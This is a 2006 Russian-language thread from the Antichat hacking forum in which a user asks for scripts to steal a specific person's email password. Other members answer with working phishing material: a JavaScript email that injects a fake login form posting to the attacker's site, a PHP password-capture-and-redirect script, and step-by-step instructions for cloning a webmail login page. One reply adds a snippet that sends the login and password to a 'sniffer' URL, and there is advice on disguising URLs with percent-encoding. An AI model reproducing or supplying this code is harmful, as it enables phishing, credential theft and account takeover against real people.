Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
скрипты для тырения паролей!!! |
20.01.2006, 12:45
|
|
Новичок
Регистрация: 29.12.2005
Сообщений: 11
Провел на форуме:
25965
Репутация:
3
|
|
скрипты для тырения паролей!!!
|
|
|
20.01.2006, 12:57
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
Если скрипт будет написан на JS, то в исходнике будет виден весь код, в том числе и та ссылка куда перенаправляется юзер в случае нажатия ОК.. в JS используй функцию confirm.
Можно написать на пхп.. ) тогда исходники никто не увидит и ничего не заподозрит)).
Подобные скрипты поищи на сайте вовеб.ру =)
|
|
|
|
20.01.2006, 13:36
|
|
Новичок
Регистрация: 29.12.2005
Сообщений: 11
Провел на форуме:
25965
Репутация:
3
|
|
2 Rebz
письмо будем отправлять человеку для которогу урл и нтмл даже звучат одинаково ))
скрипт надо запустить из письма, то есть на клиентской стороне (пхп этого не может), спасибо за ссылку, только лично мне от нее толку мало, я в яваскрипт и пхп ваще не шарю. мне требуется ВАША помощь, то есть помогите плиз найти или написать этот скрипт. есть же здесь умные люди?!
________________________________________________
всем кто поможет + (похоже на подкуп...   ) |
|
|
|
20.01.2006, 14:17
|
|
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541
Репутация:
761
|
|
Товарищ, где это вы видили чтобы JS срабатывал в письме? (конечно, такое есть, но это всё приватно)
Вот пример письма с картинкой :]
Код:
<html>
<head>
<script language="JavaScript">
var FalseDoc="тут текст страници авторизации+ наша подделанная форма<form action=\"http://нашсайт.ру/auth/\"><input type=text name=pass><input type=submit></form>";
function zapadlo()
{
alert('IE must die');
document.write(FalseDoc);
}
</script>
</head>
<body>
<img src="photo.jpg" onClick="zapadlo();">
</body>
</html>
а на своём сайте делаешь php скрипт который получает пас и делает редирект уже с подставленным пасом
PHP код:
<?php
if (isset($_GET['pass']))
{
//сохраняешь пас куда надо
//сам редерект
header('Location: http://mail.ru/auth/?pass='.$_GET['pass']);
}
?>
Последний раз редактировалось fucker"ok; 20.01.2006 в 14:45..
|
|
|
|
20.01.2006, 14:35
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
Со стандартыми окошками браузера много не наворотишь.
Если и делать так, то немного по-другому:
Выводить слой, а уже на нем будет это окно (изображением). Кнопки должны будут нажиматься (onClick) и реагировать (onMouseOver). Но перед этим надо эти изображения подгрузить и уже потом выводить. А то мало-ли - чел по диалапу и увидит разметку для изображения.
+ надо учитывать и то, что в мире существует не тока браузер ИЕ и все сидят не тока на WinXP. А сидящие на WinXP не все юзают синее стандартное оформление винды. Т.е. опятьже - не все идеально. Можно сделать только по ИЕ-WinXP-синее оформление...
Но тока зачем? Если у тебя получилось внедрить JS чтобы вывести окошко, то почему бы тебе не внедрить JS редиректа на фэйк сайт с оформлением почтовика и сообщением "Период сессии истек. Введите логин/пароль для авторизации".
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
Последний раз редактировалось censored!; 20.01.2006 в 14:51..
|
|
|
|
27.01.2006, 12:44
|
|
Новичок
Регистрация: 29.12.2005
Сообщений: 11
Провел на форуме:
25965
Репутация:
3
|
|
2 censored!
почему бы тебе не внедрить JS редиректа на фэйк сайт с оформлением почтовика и сообщением "Период сессии истек. Введите логин/пароль для авторизации".
собственно этого я и хочу добиться, а истек ли там период сессии ил произошла ошибка браузера, это детали. Ты можешь написать этот скрипт? я в JS не шарю, а время идет...
еще вопрос вот в чем, как подменить URL в адресной строке? чтобы без палева...
по части того что JS не работает в письме:
можно в письме дать ссылку на какой-то сайт (с красивой картинкой и редиректом на липовую страницу). Самое главное, чтобы все происходило в одном окне. а как этого добиться? |
|
|
|
27.01.2006, 13:50
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
собственно этого я и хочу добиться, а истек ли там период сессии ил произошла ошибка браузера, это детали. Ты можешь написать этот скрипт? я в JS не шарю, а время идет...
Заходишь на страничку почтовика где требуют ввести логин/пароль. Жмешь правую кнопку мышки и выбираешь "Просмотр HTML-кода". Откроется Блокнот (или что у тебя там настроено?). Жмешь сохранить и сохраняешь, например, под именем relogin.htm
...
Открываешь relogin.htm и начинаешь его доделывать - дописываешь полные пути до изображений, ссылок и т.п. Доделал? Запускай его и смотри чтобы без ошибок на странице, все ссылки ввели на настоящий сайт, все изображения нормально отображались. Ну теперь и добавляй надпись - период сессии истек, требуется перезайти на сайт. Сохраняйся. Делай копию (как откат). Открывай. Запускай на странице поиск по слову form, смотри какое у него имя. Допустим - name=formsendlogin, теперь ищи поле ввода логина и смотри какое у него name, допустим - name="login", тоже самое и с паролем: name="password"
Теперь ищи что-то типа такого куска <input type="submit". Допустим у тебя будет так:
<input type="submit" value="готово" class="button">
, тогда добавляй к нему onClick=go_go_go();, чтобы получилось:
<input type="submit" value="готово" class="button" onClick=go_go_go();>
Т.е. при клике по кнопке мы и отправим и вызовим функцию. Теперь найди </form> и вставь после него такой код:
<script>
function go_go_go(){
img = new Image();
img.src = "http://путь_до_твоего_снифера.ru/s.php?"+"Login:"+document.formsendlogin.login.valu e+" Password:"+document.formsendlogin.password.value;
}
</script>
Тока в строчках document.formsendlogin.login.value и document.formsendlogin.password.value замени formsendlogin, login и password на название своих полей.
еще вопрос вот в чем, как подменить URL в адресной строке? чтобы без палева...
Вот тут внимательно прочитай:
http://www.forum.antichat.ru/thread11236.html
Там первый пост если на странице есть фрэймы, а чуть дальше пример если фреймов нет.
Но! Там должно открываться новое окно.
Чтобы в этом - зарегь себе сайт на бесплатном хостинге, и перекидывай на урл:
http://www.названиесайтапочтовика.%6...8d8434ce0d8a97
Вообщем, просто запугай длинным урлом. Так как не все обратят внимание на %68%31%36
по части того что JS не работает в письме:
можно в письме дать ссылку на какой-то сайт (с красивой картинкой и редиректом на липовую страницу). Самое главное, чтобы все происходило в одном окне. а как этого добиться?
Ну прикинь - ты жмешь на ссылку на какой-то сайт, а тебе пишут что сессия истекла на почтовике. Надо при загрузке страницы сразу редиректить либо, как пахало на яндексе (щас - незнаю пашет или нет) - просто прилепляешь заряженое изображение с мелкими деталями, при клике по которому открывается новое (где и происходит редирект). Но при этом встраивать запись куки. Чтобы не получилось так, что его каждый раз при попытке просмотра письма будут редиректить. Вот поэтому и надо встроить запись куки. Чтобы редиректило тока один раз.
Методов редиректа несколько. Смотря какую активную XSS ты юзаешь, или как используешь и куда перекидываешь. Тут надо конкретно смотреть.
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
Последний раз редактировалось censored!; 27.01.2006 в 13:53..
|
|
|
|
27.01.2006, 17:56
|
|
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541
Репутация:
761
|
|
собственно этого я и хочу добиться, а истек ли там период сессии ил произошла ошибка браузера, это детали. Ты можешь написать этот скрипт? я в JS не шарю, а время идет...
еще вопрос вот в чем, как подменить URL в адресной строке? чтобы без палева...
Собственно я этот код и написал выше, естественно его нужно дополнить под твой случай.
|
|
|
|
30.01.2006, 11:04
|
|
Новичок
Регистрация: 29.12.2005
Сообщений: 11
Провел на форуме:
25965
Репутация:
3
|
|
2 censored!
спасибо за советы, только руки у меня видимо совсем кривые...  Браза, тебя если не затруднит, стукни плиз ко мне в аську... а то вопросы, но флэйм разводить неохота. 
27-696-13-17
|
|
|
|
30.01.2006, 14:38
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
Пиши по ПМ
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
(а они то мне страсть как нужны!!!!) да хорошо бы чтобы при "повторной авторизации" происходил редирект на настоящую страницу (где его снова попросят ввести пароль 
Похожие темы
Линейный вид
